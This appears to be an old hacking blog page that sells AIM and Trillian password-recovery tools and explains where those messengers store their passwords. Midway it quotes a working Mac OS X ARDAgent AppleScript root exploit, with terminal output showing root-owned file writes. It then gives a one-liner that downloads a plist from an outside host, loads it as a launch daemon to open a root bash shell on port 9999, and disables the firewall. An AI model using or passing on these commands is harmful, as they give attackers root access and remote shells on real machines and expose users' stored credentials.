With all this new traffic coming in we’re going to repost our 2 password recovery programs. Both are coded in Assembler and are only about 10kb which means you can keep them on your favorite thumbdrive and it barely takes any room. No other files needed to run.

We only sell these tool in order to keep this site up and running. Also if you would like to donate you can click on the paypal icon on the left panel. Thanks in advance for all your support and we hope to keep more info coming.

This version will recover all your AOL Instant Messenger screen names and only the first 3 letters of your AIM password. If you would like to purchase the full version for $4.99 USD , which shows the complete password, you can do so by choosing paypal or e-gold for payments in the links below.

[smartcounter:6]

TrillianView demo version is now available for download . This version will recover all your Trillian Messenger screen names and only the first 3 letters of your password. If you would like to purchase the full version for $4.99 USD , which shows the complete password, you can do so by choosing paypal or e-gold for payments in the links below.

[smartcounter:5]

Brief introduction on how Internet Explorer stores its passwords

(more…)

This works in Internet Explorer, Firefox, Netscape and Opera browsers
Go to a page that has a password hidden by ***’s then just paste this simple script below into your browser bar and it will pop up a messagebox showing your password.

This script replaces the ****’s with the plaintext password , works in Firefox only

Also quick access to Firefox’s password manager instead of going through the menus
Paste this in your browser: chrome://passwordmgr/content/passwordManager.xul

Half the Mac OS X boxes in the world (confirmed on Mac OS X 10.4 Tiger and 10.5 Leopard) can be rooted through
AppleScript:
osascript -e ‘tell app “ARDAgent” to do shell script “whoami”‘;

I don’t have (and never have had) Screen Sharing enabled on Leopard 10.5.3, and this exploit works perfectly.
dan@Geelong:~$ ls -lh /etc/somefile
ls: /etc/somefile: No such file or directory
dan@Geelong:~$ osascript -e ‘tell app “ARDAgent” to do shell script “touch /etc/somefile”‘
dan@Geelong:~$ ls -lh /etc/somefile
-rw-rw-rw- 1 root wheel 0B Jun 18 14:16 /etc/somefile
dan@Geelong:~$ osascript -e ‘tell app “ARDAgent” to do shell script “rm /etc/somefile”‘
dan@Geelong:~$ ls -lh /etc/somefile
ls: /etc/somefile: No such file or directory
So, how dangerous is this? Here’s an example:

osascript -e ‘tell app “ARDAgent” to do shell script “cd /System/Library/LaunchDaemons ; curl -o bash.plist http://cdslash.net/temp/bash.plist [cdslash.net] ; chmod 600 bash.plist ; launchctl load bash.plist ; launchctl start com.apple.bash ; ipfw disable firewall; launchctl “‘

This will download, install, load, and start a plist that provides an interactive bash shell on port 9999, and disables the ipfw firewall (Which is not enabled by default). If you run the above, you can ‘nc localhost 9999’ and find yourself at a root shell.

To remove, run ‘launchctl unload com.apple.bash’ ‘launchctl unload /System/Library/LaunchDaemons/bash.plist’ and then ‘rm /System/Library/LaunchDaemons/bash.plist’

It should be noted that this service is accessible even if the application firewall is enabled. The only thing protecting the user at this point is their router firewall, if they have one, and that’s easily bypassed with a Python script.

So yeah; anything can be downloaded, and anything can be done with it. Scary.

nice writeup on the common passwords and peoples thought process on picking passwords

http://blog.jimmyr.com/Most_Common_Passwords_20_2008.php

because this is continually updating
find the newest info here

TrillianView demo version is now available for download . This version will recover all your Trillian Messenger screen names and only the first 3 letters of your password. If you would like to purchase the full version for $4.99 USD , which shows the complete password, you can do so by choosing paypal or e-gold for payments in the links below.




[smartcounter:5]

The trillian passwords are stored separately in .ini files (i.e. msn.ini,yahoo.ini aim.ini etc). These are stored in your trillian directory (usually c:\program files\trillian\) in the “users” folder.

Within the users folder, the ini files will either be in a folder called “default” or a folder named after your username.

c:\program files\trillian\users\default\msn.ini (more…)

Our first tool release will be a program to recover passwords from AOL 6.x. Our free Demo version will be released soon and will only show the first 3 letters and the length of the password

AIM 6.x (6.5 & beta 6.8) uses 2 algorithms to encrypt your AIM password. First the Blowfish algorithm is used to encrypt the AIM password using a 448 bit keyword.
The encrypted string is then encoded using base64 and stored in the registry at:
\\HKEY_CURRENT_USER\Software\America Online\AIM6\Passwords

WordPress Installed. Site is on its way!